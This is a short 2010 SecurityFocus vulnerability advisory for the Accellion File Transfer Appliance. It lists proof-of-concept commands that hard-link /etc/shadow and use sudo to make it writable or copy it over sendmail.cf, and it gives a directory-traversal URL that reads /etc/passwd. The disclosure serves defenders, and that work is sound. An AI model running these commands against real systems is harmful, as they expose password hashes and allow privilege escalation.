Accellion File Transfer Appliance Multiple Remote Vulnerabilities

An attacker can use readily available network utilities to exploit some of these issues. For the HTML-injection and directory-traversal issues, the attacker can use a browser.

The following proofs of concept are available:

sh-2.05b$ ln /etc/shadow /home/admin/oldtemp
sh-2.05b$ sudo /bin/chmod 666 /home/admin/oldtemp

sh-2.05b$ ln /etc/shadow /home/admin/temp
sh-2.05b$ sudo /bin/cp /home/admin/temp /etc/mail/sendmail.cf

sh-2.05b$ sudo /usr/local/bin/admin.pl

https://www.example.com/courier/1000@1276123d688676a09e0100b4f54b239c/web_client_user_guide.html?lang=../../../../../etc/passwd


 

Privacy Statement
Copyright 2010, SecurityFocus